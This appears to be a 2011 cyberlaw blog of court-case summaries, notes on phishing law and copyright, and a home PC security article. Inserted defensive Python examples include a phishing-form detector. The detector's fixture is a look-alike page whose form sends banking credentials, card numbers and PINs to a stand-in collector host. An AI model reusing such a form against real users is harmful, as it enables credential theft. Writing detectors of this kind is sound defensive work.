Sunday, August 28, 2011

Sandals Resorts Intern. Ltd. v. Google, Inc.

Some unknown person sent an email to a number of undisclosed recipients containing information that was critical of the hiring and other business practices of the Caribbean resort Sandals. Irritated by this communication, Sandals filed an action in New York state court seeking a subpoena to compel Google to identify the owner of the offending Gmail account.

The trial court denied the petition seeking discovery. Sandals sought review with the appellate court. On appeal, the court affirmed the denial of the petition for discovery.

Under New York law, a person or entity can learn the identity of an unknown possible defendant only when it demonstrates that it has “a meritorious cause of action and that the information sought is material and necessary to the actionable wrong.” In this case, the court held that the petition failed to demonstrate that Sandals had a meritorious cause of action.

The court found that nothing in the petition identified specific assertions of fact as false. It also found that the lower court did not err in reasoning that the failure to allege the nature of the injuries caused by the statements in the email was fatal to the petition.

It went on to find that even if the petition had sufficiently alleged the email injured Sandals’ business reputation or damaged its credit standing, it would still deny the application for disclosure of the account holder’s identification on the ground that the subject email was constitutionally protected opinion.




Simonoff v. Expedia, Inc.

Plaintiff sued Expedia under the Fair and Accurate Credit Transactions Act (“FACTA”). He was upset that the electronic receipt Expedia emailed him contained the expiration date of his credit card.
The district court dismissed plaintiff’s case and he sought review with the Ninth Circuit. On appeal, the court affirmed that the electronic receipt did not violate FACTA.
FACTA provides that “no person that accepts credit cards or debit cards for the transaction of business shall print more than the last 5 digits of the card number or the expiration date upon any receipt provided to the cardholder at the point of the sale or transaction.”
The restriction applies only to “receipts that are electronically printed.” The court found that the electronic receipt did not fall into this scope. It looked to the general notion of what it means for something to be “printed”:
  • “Print” refers to many different technologies—from Mesopotamian cuneiform writing on clay cylinders to the Gutenberg press in the fifteenth century, Xerography in the early twentieth century, and modern digital printing—but all of those technologies involve the making of a tangible impression on paper or other tangible medium.


Friday, August 26, 2011

Users v. Facebook new Privacy Litigation

Plaintiff Facebook users sued defendant Facebook for violation of California’s Unfair Competition Law (“UCL”), Cal. Bus. & Prof. Code § 17200, et seq., alleging that Facebook intentionally and knowingly transmitted personal information about plaintiffs to third-party advertisers without plaintiffs’ consent. Facebook moved to dismiss the UCL claim. The court granted the motion.

Defendant argued that plaintiffs failed to state a claim because they lacked standing under the UCL, since they did not allege they lost money or property.  Defendant asserted there was no such loss because plaintiffs’ “personal information” did not constitute property under the UCL.

Instead, the plaintiffs had alleged that defendant unlawfully shared their “personally identifiable information” with third-party advertisers.  However, the court distinguished the plaintiffs’ claim from Doe 1 v. AOL, LLC, 719 F.Supp.2d 1102 (N.D. Cal. 2010).  In that case, the plaintiffs’ personal and financial information had been distributed to the public after the plaintiffs therein signed up and paid fees for AOL’s service.  The court dismissed plaintiff’s claim in this case under the holding of Doe v. AOL — since plaintiffs alleged they received defendant’s services for free, they could not state a UCL claim.

Hubbard v. MySpace

Plaintiff, who sued on behalf of himself and others similarly situated, claimed that MySpace improperly turned over account information and private messages to law enforcement, even though there was a search warrant. Plaintiff claimed this violated the Stored Communications Act, 18 USC 2701 et seq. MySpace moved to dismiss. The court granted the motion.

The version of the Stored Communications Act in effect at the time of the alleged wrongful disclosure in this case provided that a search warrant seeking the information must issue from a federal court “with jurisdiction over the offense under investigation,” or be “an equivalent State warrant.”

Plaintiff argued that the warrant sent to MySpace was not sufficient under the SCA (and should have been ignored) because (1) the state magistrate did not have jurisdiction to hear the felony that the cops were investigating plaintiff for, and (2) the magistrate did not have the power to issue search warrants across state lines.

The court rejected both of these arguments. In determining the warrant to be “an equivalent State warrant,” it looked to the way federal magistrates issue warrants in SCA cases. It held that the phrase “jurisdiction over the offense under investigation” refers to the power to issue warrants, not to the power to ultimately try the case. And the court looked to the legislative history around the Patriot Act amendments to conclude that SCA investigations give magistrate judges special powers to direct search warrants across state lines, because having to require cooperation with the courts in which an ISP actually exists might allow enough time for a terrorist to get away or strike again.


Frees, Inc. v. Phil McMillian

Former Employees Use Data Obtained From Plaintiff’s Computers To Aid Competitor

Defendants McMillian and Pierceall were former employees of plaintiff Frees Inc., a company that manufactures and markets ventilation and dust control systems.  Both defendants went to work for Southeast, a competitor of plaintiff.  The complaint alleged that defendants improperly obtained proprietary data from plaintiff’s computer systems, which they used to assist Southeast in competing with Frees.  Defendant McMillian was also alleged to have deleted data from Frees’ computers before he left its employ.  As a result, plaintiff expended over $16,000 to engage computer consultants to  conduct a forensic investigation of its computers, and the harm McMillian may have caused.  Frees did not suffer any interruption of service as a result of defendants’ alleged misconduct.
Plaintiff commenced this suit, asserting claims under the Computer Fraud and Abuse Act, 18 U.S.C. section 1030.  Plaintiff sought to recover both the funds expended in retaining the computer consultants, as well as the revenues it lost as a result of  defendants’ use of its proprietary data.

Tuesday, August 23, 2011

Randall David Fischer v. Mt. Olive Lutheran Church, et al.

Court allows plaintiff to proceed with claims advanced against his employer and various fellow employees under the Electronic Communications Privacy Act, the Electronic Communications Storage Act, and Wisconsin's right to privacy statute, Wis. Stat. Section 895.50, as well as a common law defamation claim, arising out of defendants' interception of a telephone call plaintiff placed from his place of employ, and defendants' review of e-mails contained in a personal e-mail account plaintiff maintained with Hot Mail, which account plaintiff accessed from his work place.  There were sharply differing versions of the content of these various communications.  Defendants alleged that during the telephone call, the participants, while masturbating, graphically described homosexual activity between two males.  Plaintiff denied this.  Defendants also alleged that e-mails read from plaintiff's email account evidenced that plaintiff was involved in homosexual activity.  Plaintiff denied that these e-mails had been sent to him.

Defendants' version of the telephone conversation was related to various third parties, which resulted in the termination of plaintiff's employment.  This lawsuit ensued.  The court determined that plaintiff should be permitted to proceed with various claims he asserted.

The court refused to dismiss plaintiff's claim, advanced under Wisconsin's right of privacy law, section 895.50, arising out of the review of e-mail from plaintiff's personal Hot Mail account.  The court held that issues of fact existed as to whether the review of such e-mail would be highly offensive to a reasonable person, and as to whether a reasonable person could consider such an account to be private, which precluded a grant of summary judgment to defendants.  The court also refused to dismiss the claim plaintiff brought under the Electronic Communications Storage Act arising out of the review of these e-mails.  If such a review took place (as opposed to defendants' having fabricated the e-mails) it would run afoul of the Stored Communications Act.  The court did dismiss the claims plaintiff raised under the Computer Fraud and Abuse Act, holding that plaintiff had not alleged economic damages arising from the review of these e-mails sufficient to state a claim under the Act.

The court also refused to dismiss the claims plaintiff advanced under the Electronic Communications Privacy Act and Wisconsin Privacy Act arising out of the interception of the telephone call described above.  The court refused to dismiss plaintiff's ECPA claim because, depending on what actually occurred, the defendants should have stopped listening to the telephone call when they discovered it was personal in nature.  The court refused to dismiss plaintiff's privacy act claims because plaintiff may have had a reasonable expectation of privacy in the telephone call if his claim that he made the call from a place his employer designated for private personal calls was true.

Lastly, the court refused to dismiss plaintiff's defamation claim, finding that issues of fact precluded it from determining whether defendants' communication of their version of the telephone call to third parties was protected by the common interest privilege possessed by members of religious associations as to communications pertaining to the qualifications of those who work for the organization.  Such privilege may have been lost, given plaintiff's claim that the defendants were lying about what took place during the telephone call.

A.V., et al. v. IParadigms, Limited Liability Company

Court holds that minors entered into valid ‘click wrap’ agreement with defendant IParadigms LLC (“IParadigms”) by clicking an “I agree” icon which appeared directly below an online Usage Agreement, and indicated their assent to be bound thereby. Plaintiffs were high school students that were directed by the schools they attended to submit class work to defendant IParadigms’ “Turnitin” website to check for plagiarism. As part of this submission process, plaintiffs were obligated to assent to the site’s Usage Agreement. Because the Usage Agreement contained a limitation of liability clause precluding liability to plaintiffs as a result of their use of the Turnitin site, the Court rejected plaintiffs’ copyright infringement claims, which arose out of defendant’s storage of plaintiffs’ class work in a database used to check student homework for plagiarism.
In reaching this result, the Court rejected plaintiffs’ claims that, as minors, they were not bound by the terms of the site’s Usage Agreement.  Because they had accepted the benefits of the agreement – the ability to submit their class work for grade to their respective schools was dependent upon their use of the site – they could not escape the contractual conditions upon which such benefits were rendered.
The Court further held that plaintiffs’ copyright infringement claims failed because defendant had made a permissible fair use of their works.  In reaching this result, the Court relied on the fact that Turnitin’s use of plaintiffs’ school work was highly transformative of the original works, in that it added plaintiffs’ school work to a non-publicly available database used only to check for plagiarism by students.  The Court also rested its holding of fair use on the fact that defendant’s use did not impact the market for plaintiffs’ works, as the copies Turnitin made thereof were not available to the public, but rather maintained in a non-public database.
The Court rejected the counterclaims advanced by defendant iParadigms, including a claim for indemnification as a result of the commencement of this action.  This claim was based on a separate “Usage Policy” found on the Turnitin site.  The Court held that plaintiffs were not bound by this policy, which was not linked or otherwise referenced in the Usage Agreement to which plaintiffs were in fact bound.  There was no evidence that plaintiffs were aware of this separate “usage policy,” which was contained in a link on each page of the Turnitin site.  As a result, and because the parties’ contract stated that it constituted the full agreement between the parties, the plaintiffs’ use of the site was held not to create a valid browse wrap agreement, and the claim for indemnification, predicated on the Usage Policy, was dismissed.

Saturday, August 20, 2011

Deloitte & Touche LLP v. Carlson

Defendant had risen to the level of Director of a large consulting and professional services firm. (There is some irony here – this case involves the destruction of electronic data, and defendant had been in charge of the firm’s security and privacy practice.)

After defendant left the firm to join a competitor, he returned his work-issued laptop with the old hard drive having been replaced by a new blank one. Defendant had destroyed the old hard drive because it had personal data on it such as tax returns and account information.

The firm sued, putting forth a number of claims, including violation of the Computer Fraud and Abuse Act (CFAA). Defendant moved to dismiss for failure to state a claim upon which relief can be granted. The court denied the motion.

Defendant argued that the CFAA claim should fail because plaintiff had not adequately pled that the destruction of the hard drive was done “without authorization.” The court rejected this argument.

The court looked to Int’l Airport Centers LLC v. Citrin, 440 F.3d 418 (7th Cir. 2006) for guidance on the question of whether defendant’s alleged conduct was “without authorization.” Int’l Airport Centers held that an employee acts without authorization as contemplated under the CFAA if he or she breaches a duty of loyalty to the employer prior to the alleged data destruction.


Reichert v. Elizabethtown College

Plaintiff’s threatening behavior toward certain faculty members of his college led the administration to monitor plaintiff’s school-issued email account. Plaintiff’s lawsuit against the school included claims for violation of the Electronic Communications Privacy Act (ECPA), the Stored Communications Act (SCA), and common law invasion of privacy. The college moved to dismiss these claims and the court granted the motion.
The court found that the ECPA claim failed because plaintiff did not allege the interception of the email messages was contemporaneous with the messages’ transmission. As for the SCA claim, the court noted that the statute protects electronic communications providers from liability for searches of their own systems which are used to provide the service. 

Sunday, August 14, 2011

Payday Advance Plus, Inc. v. Findwhat.com, Inc., and Advertising.com, Inc.

Court allows plaintiff to proceed with ‘click-fraud’ claim against defendant Findwhat.com, a search engine operator.  The complaint alleged that to increase its revenues from pay-per-click advertisements posted on its site by plaintiff, defendant Findwhat.com directed defendant Advertising.com to engage ‘bots’ and individuals to click on plaintiff’s advertisements.  This had the effect of increasing defendant Findwhat.com’s revenues, as plaintiff paid it on a pay-per-click basis.  The complaint alleged that defendant Findwhat also bid on pay-per-click search terms, thereby improperly increasing the price plaintiff had to bid therefore to obtain higher placement for such terms.  The Court held that such misconduct could run afoul of the implied covenant of good faith and fair dealing in the parties’ contract, and accordingly allowed plaintiff to proceed with a breach of contract claim against defendant Findwhat.com. Findwhat.com changed its name to Miva, Inc. in June 2005.
The Court did dismiss the balance of the claims plaintiff asserted.  Its unjust enrichment claims failed because there was a valid contract governing the subject matter of plaintiff’s claim.  Plaintiff’s negligence claims failed because of the absence of any independent duty on the part of defendant Findwhat.com to monitor the source of the ‘clicks’ plaintiff received.  Such an obligation would be governed by the terms of the parties’ contract. 
Finally, plaintiff’s fraudulent concealment claim failed because of plaintiff’s failure to plead such claim with the requisite particularity.  Plaintiff was granted leave to replead this claim, premised on defendant Findwhat.com’s alleged duty to disclose that it was improperly causing a third party to click on plaintiff’s ads so as to increase Findwhat.com’s revenues.  Such a claim, if properly alleged, would serve to support a civil conspiracy claim against defendant Advertising.com, which was the party that allegedly arranged to have a ‘bot’ click on plaintiff’s ads.

Kenneth Aitken v. Communications Workers of America

Court denied motion to dismiss complaint charging the defendant Union and two of its organizers with violating the CAN-SPAM Act by sending email solicitations promoting union membership to Verizon employees which purported to come from Verizon managers who did not authorize their transmission.  The Virginia District Court held that it could exercise personal jurisdiction over the non-resident Union organizers because both the corporate servers used to transmit these emails, as well as some of the employees who received them, were located in Virginia.
The Court further held that plaintiff Verizon had stated valid CAN-SPAM claims against the defendants.  In reaching this result, the Court rejected defendants’ contentions that their solicitations constituted non-commercial speech promoting union membership exempt from the strictures of CAN-SPAM.  Because the Union rendered a service – representation of employees – for a fee – union dues – the emails constituted commercial speech.  As such, held the Court, the failure of these emails to accurately describe their source, or to appropriately advise that they were, in fact, advertisements, as well as their failure to provide mandated opt-out instructions, rendered their senders potentially liable for violations of CAN-SPAM.

Saturday, August 13, 2011

Zango and Kaspersky case

Zango, an online media company, came up short in its attempt to force an anti-virus company to reclassify its "spyware" tag for the company's adware.

The U.S. District Court for the Western District of Washington ruled in favor of Kaspersky Lab, granting the security company immunity from liability in a suit filed by Zango. According to Kaspersky, Zango sued them to force the company to reclassify Zango's programs as "non-threatening" and to prevent Kaspersky's security software from blocking Zango's programs. 
"Kaspersky Lab's mission is, and has always been, to make the Internet a safer place for all," said Steve Orenberg, president of Kaspersky Lab, USA, in a statement. "We are thrilled with the outcome of this case because it supports the key message of the information security industry -- consumer protection comes first."

The judge threw out Zango's lawsuit on the grounds that Kaspersky was immune from liability under the Communications Decency Act, part of which states that a provider or user of an interactive computer service shall not be held liable on account of any action voluntarily taken in good faith to restrict access to material that the provider or user considers to be "obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable."
Kaspersky noted that the ruling protects the consumer's right to determine what information and software is allowed on their computer, and gives anti-malware vendors the right to identify and label software programs that may be potentially unwanted and harmful to a user's computer as they see fit.

India phishing case

A financial institution registered a complaint stating that some persons (“perpetrators”) had sent misleading emails that ostensibly came from ICICI Bank’s email ID, with the intent to defraud the bank’s customers.
The investigation was carried out with the help of the emails received by the institution’s customers, and the accused was arrested. The place of the offence, at Vijaywada, was searched for evidence. A laptop and a mobile phone used in the commission of the crime were seized there.
The accused had used an open source email application to send the spam emails. He had downloaded the software from the internet and used it as is.
He used only VSNL email addresses for the spam sent to the institution’s customers, because the VSNL email service did not have a spam box to block unsolicited emails.
After the spam run he received responses from around 120 customers, of which 80 were genuine; the others were not usable because they did not include the debit card details required for e-banking.
Customers who received the email believed that it originated from the financial institution. When they filled in their confidential information and submitted it, the information was sent to the accused. This was possible because of a dynamic link on the first page (home page) of the fake web site. A dynamic link here means that the link is activated only when a person clicks the link provided in the spam email. It was coded by handling the Internet Explorer onclick() event, so that the form’s contents were submitted to the web server hosting the fake web site. The server then sent the data to a configured email address, which in this case was the accused’s email address. All of the phished information (user name, password, transaction password, debit card number and PIN, mother’s maiden name) reached him over the Wi-Fi internet connectivity of Reliance.com that was available on his Acer laptop.
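
The case above turns on a form that collects banking credentials and hands them to a server that is not the bank's. As an added example (not part of the original post or the case record), the following check audits a page for exactly that: forms asking for the listed data whose page or submission target lies outside the institution's domain. The domain names, field-name fragments and sample pages are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Fragments of field names for the data listed above (user name, passwords,
# debit card number, PIN, mother's maiden name). The fragments are assumptions.
SENSITIVE_HINTS = ("user", "login", "pass", "pin", "card", "maiden")


class FormAudit(HTMLParser):
    """Collect every <form>: its action, input names, and onclick use inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "fields": [], "onclick": False}
            self.forms.append(self._current)
        elif self._current is not None:
            if tag == "input" and a.get("name"):
                self._current["fields"].append(a["name"].lower())
            if "onclick" in a:
                self._current["onclick"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_in_domain(host, domain):
    """True only for the domain itself or a real subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def audit_page(html, page_url, brand_domain):
    """Return one finding per credential form served or submitted off-domain."""
    parser = FormAudit()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        sensitive = sorted({f for f in form["fields"]
                            if any(h in f for h in SENSITIVE_HINTS)})
        if not sensitive:
            continue
        # A relative action posts back to the host that served the page.
        action_host = urlparse(form["action"]).hostname or page_host
        if not (host_in_domain(page_host, brand_domain)
                and host_in_domain(action_host, brand_domain)):
            findings.append({"fields": sensitive,
                             "page_host": page_host,
                             "action_host": action_host,
                             "onclick_submit": form["onclick"]})
    return findings


# Constructed sample: a look-alike page that posts to a third-party host.
FAKE_PAGE = """
<html><body>
<form name="f" action="http://collector.example.net/save.php" method="post">
  <input name="username"><input name="password" type="password">
  <input name="txn_password" type="password">
  <input name="card_no"><input name="pin" type="password">
  <input name="maiden_name">
  <input type="button" value="Login" onclick="document.f.submit()">
</form></body></html>
"""

# Constructed sample: the institution's own login form with a relative action.
REAL_PAGE = """
<form action="/login" method="post">
  <input name="username"><input name="password" type="password">
  <input type="submit" value="Login">
</form>
"""

if __name__ == "__main__":
    print(audit_page(FAKE_PAGE, "http://bank.example.signin.test/index.html",
                     "bank.example"))
    print(audit_page(REAL_PAGE, "https://www.bank.example/login", "bank.example"))
```

The host comparison is by domain suffix on a label boundary, so a look-alike host that merely starts with the institution's name is still reported.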

Egypt and US. phishing case

The US and Egyptian fraudsters were accused of using phishing scams to steal account details from hundreds, possibly thousands, of people, and transferring about $1.5 million into fake accounts they controlled.

The group of fraudsters were accused of targeting US financial institutions and victimising a number of account holders by fraudulently using their personal financial information after they were successfully phished.

The arrests were the result of an investigation called ‘Operation Phish Phry’. Starting in 2007, FBI agents worked with US financial institutions to “identify and disrupt” criminal phishing gangs.

“This international phishing ring had a significant impact on two banks and caused huge headaches for hundreds, perhaps thousands of bank customers,” said Acting US Attorney George S. Cardona, in a statement.

“Organised, international crime rings can only be confronted by an organised response by law enforcement across international borders, which we have seen in this case.”

Sunday, August 7, 2011

Phishing and laws

Definition of Phishing

According to Merriam-Webster, “phishing” is “a scam by which an email user is duped into revealing personal or confidential information which the scammer can use illicitly.”
Wikipedia states “in the field of computer security phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in electronic communication.”

Federal Laws

CAN-SPAM (Controlling the Assault of Non-Solicited Pornography And Marketing) Act of 2003
  • Signed into law by George W. Bush
  • Sets standards for sending commercial email
  • It is a misdemeanor to send spam with falsified header information!

Anti-Phishing Act of 2004 (never got past committee)
  • Introduced by Senator Patrick Leahy

Anti-Phishing Act of 2005 (never enacted)
  • This law, had it passed, would have imposed large fines and lengthy prison sentences for “fake websites and bogus websites” developed for the purpose of defrauding individuals
  • First law to differentiate and target “phishing” specifically

Friday, August 5, 2011

Six Exclusive Rights of the Copyright Holder


(1) To reproduce the copyrighted work in copies or phonorecords; 

(2) To prepare derivative works based upon the copyrighted work; 

(3) To distribute copies or phonorecords of the copyrighted work to the public by sale or other transfer of ownership, or by rental, lease, or lending; 

(4) In the case of literary, musical, and other audiovisual works, to perform the copyrighted work publicly; 

(5) In the case of literary, musical, etc., to display the copyrighted work publicly; and 

(6) In the case of sound recordings, to perform the copyrighted work publicly by means of a digital audio transmission.

Online Materials and Copyright

The copyright holder has the same rights regardless of the format of the work (e.g., online, Web-based, CD-ROM)
The right to copy the work remains with the owner; this includes a copy to your computer.
If you make a copy for your personal use, it is likely to be regarded as fair use.  If you post it to a public Web site, it is unlikely to be considered fair use.

Guidelines for Using Online Materials

Check if the copyright holder provides information on how his/her document or computer program may be used.
If possible, get permission from the copyright holder and keep a record of the permission granted.
If you intend to use something repeatedly, get permission.

Wednesday, August 3, 2011

How to Judge Fair Use

1- Purpose and character of the use.
  • Commercial vs. non-profit educational purposes.
2- Nature of the copyrighted work.
3- The amount of the work used.
4- The effect of the use on the market potential of the work.

NOTE: All four factors are weighed; no one factor ensures fair use.

Fair Use Copying Guidelines for Instructors:

Single copies:
  • A chapter from a book (not the entire book).
  • An article from a periodical or newspaper.
  • A short story, essay, or poem whether from an anthology or not.
  • A chart, graph, diagram, drawing, cartoon, or picture from a book, periodical, or newspaper.

Good Reasons for Fair Use

You are making a productive use of someone else’s creativity in which the other person’s creativity is an indispensable component:
  • Example 1:  Literary criticism.  You must quote an author’s work in order to critique it.
  • Example 2:  Parody.  You must use some elements of an author’s work in order to satirize it.

You are engaged in one of the public interest activities that Congress has explicitly recognized:
  • Criticism, Comment
  • News reporting
  • Teaching, scholarship, or research

What you are doing has no commercial impact on the author, not even a lost opportunity.


Securing Your PC and Data


Communications

A large part of security clearly involves developing a sense of the inbound and outbound communications that your computer is engaged in. Malware is often used to acquire information, computing resources, and so on for untoward purposes. Each of those objectives requires establishing communication with the outside world.

It's been noted in many places, but will be repeated here for emphasis: if you are dealing with the control of unwanted/undesired communications, your machine is already compromised. You are not eliminating the compromise by controlling the communications; you are mitigating the range of consequences. That is a very beneficial end result, but the scope of the result needs to be fully appreciated. Control of communications provides containment, not necessarily remedy, of malware.

There are a number of specific approaches that can be used to monitor and control communications. One detail to keep in mind: if control is exerted off the computer, you are dealing with packets, ports, destinations, and perhaps glimpses of information. Control exerted on the computer can draw on much higher-level knowledge of the communication. For example, the specific application participating in the communication will be known.

With regards to specific approaches:

Router: A router is not a security device, but its functional behavior has clear security implications. In very basic terms, a router will automatically reject unsolicited inbound communications to your PC. It will not reject solicited, but malicious, communications. The benefits and robustness of the operational hardware firewalling provided by a router are covered well in discussions such as El Cheapo Router Challenge and First winner - El Cheapo Router Challenge. Every home broadband user should employ a router. An excellent site to visit for coverage of router (and other) hardware is SmallNetBuilder.com. In particular, visit the Wireless Performance Charts section if you're actively shopping for a device.

Software firewall (client): For the majority of average users, use of the Windows based firewall or the firewall component of a security suite is generally more than enough. Specialized/dedicated firewalls generally afford much more latitude with respect to the granularity with which communications can be managed and controlled via the development of detailed rules by application, port, or protocol, among other possible variables. The primary difference between the communication control provided by a router and a full featured firewall is as follows:
  • A router is a separate dedicated hardware device. The computational load associated with it has no impact on PC resource load. It is therefore effectively a means of resource load balancing.
  • A router deals with packets and packets only. It has no direct knowledge of the application generating the communications. Rules to control communications will therefore tend to be time (day/hour/net amount) and protocol (tcp/ip arp, by port number, etc.) based.
  • If you really wish to actively control communications between your PC and the outside world, a software firewall is a must.
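
To make the router versus software firewall distinction concrete, here is an added example (not from the original article) that takes Windows `netstat -ano` and `tasklist /fo csv /nh` output, joins connections to the owning program, and compares a port-only rule of the kind a router can apply with a per-application allowlist. The captured text, program names, addresses and both rule sets are constructed assumptions.

```python
import csv
import io

# Constructed sample of `netstat -ano` output (documentation-range addresses).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED     4312
  TCP    192.168.1.20:49733     198.51.100.7:443       ESTABLISHED     7720
  TCP    192.168.1.20:49750     198.51.100.25:25       ESTABLISHED     7720
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       996
  UDP    0.0.0.0:5353           *:*                                    2104
"""

# Constructed sample of `tasklist /fo csv /nh` output.
TASKLIST = '''"browser.exe","4312","Console","1","210,000 K"
"updater32.exe","7720","Console","1","8,400 K"
"svchost.exe","996","Services","0","9,000 K"
'''

# Router-style rule (assumed): outbound web traffic is allowed, by port only.
ROUTER_ALLOWED_PORTS = {80, 443}

# Software-firewall rule (assumed): only listed programs may talk, per port.
APP_ALLOW = {"browser.exe": {80, 443}}


def parse_tasklist(text):
    """Map PID -> image name from CSV tasklist output."""
    return {int(row[1]): row[0].lower()
            for row in csv.reader(io.StringIO(text)) if len(row) >= 2}


def parse_netstat(text):
    """Return established outbound TCP connections with their owning PID."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        # Header, listening sockets and UDP rows do not match this shape.
        if len(parts) != 5 or parts[0] != "TCP" or parts[3] != "ESTABLISHED":
            continue
        host, _, port = parts[2].rpartition(":")
        conns.append({"dst": host, "port": int(port), "pid": int(parts[4])})
    return conns


def evaluate(netstat_text, tasklist_text):
    """Attach the program name and both verdicts to every connection."""
    names = parse_tasklist(tasklist_text)
    rows = []
    for conn in parse_netstat(netstat_text):
        app = names.get(conn["pid"], "unknown")
        rows.append({**conn, "app": app,
                     # The router sees only the packet: port and destination.
                     "router_allows": conn["port"] in ROUTER_ALLOWED_PORTS,
                     # The host firewall also knows which program is talking.
                     "host_allows": conn["port"] in APP_ALLOW.get(app, set())})
    return rows


def passes_router_only(rows):
    """Connections the port rule lets through but the program rule contains."""
    return [(r["app"], r["dst"], r["port"])
            for r in rows if r["router_allows"] and not r["host_allows"]]


if __name__ == "__main__":
    for app, dst, port in passes_router_only(evaluate(NETSTAT, TASKLIST)):
        print(f"{app} -> {dst}:{port} passes the router, blocked on the host")
```

The unlisted program's connection on port 443 is indistinguishable from browser traffic at the router; only the on-host rule separates the two.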

Hybrid solutions: Instead of a dedicated hardware router, if you’re in possession of an older PC, this can be converted into a somewhat more powerful and flexible router solution using readily available packages such as Smoothwall, m0n0wall, pfSense, IPCop, or Endian. These and related products can be used to turn legacy hardware into flexible firewall/routing solutions.

Wireless communications: With the increasing prevalence of laptops, netbooks, and other small devices enabled with wireless communication, the management of wireless access is a factor that needs to be addressed at some point. Although Bruce Schneier has written about My Open Wireless Network (see also Terrorists Using Open Wireless Networks, a counterpoint also by Schneier), the simple fact of the matter is that personal wireless networks should be closed access with a decent level of encryption enabled. As a base level of security, the ability to remotely administer a wireless router should be disabled as a matter of course (this is the typical default) and WPA2 encryption should be employed. For the generation of various keys required for encryption, a number of convenient sources are available online (SpeedGuide.net WLAN Key Generator or WEP/WPA key Generator from Soroban Systems are representative examples).

Are any of these solutions needed?
  • At the very least, any home with computers on the internet should employ a consumer level router. They are cheap, effective, remove computational load from the user’s PC, and are robust.
  • If wireless connections are used in the home, the link should be encrypted with WPA2 level encryption.
  • If the user feels that active control of communications on a process/application basis is required (and this could be as simple as denying internet access to all but a select set of applications on a per application basis), then a software firewall should be used. Note, this is the level of security at which user intervention has significantly increased. The prior two items are generally rapidly implemented and left to function. The step to implementing a coherent software firewall is much larger in most instances.
  • If spare general purpose PCs are available and unused, tasking one as a dedicated router/firewall may be beneficial from both security and educational perspectives.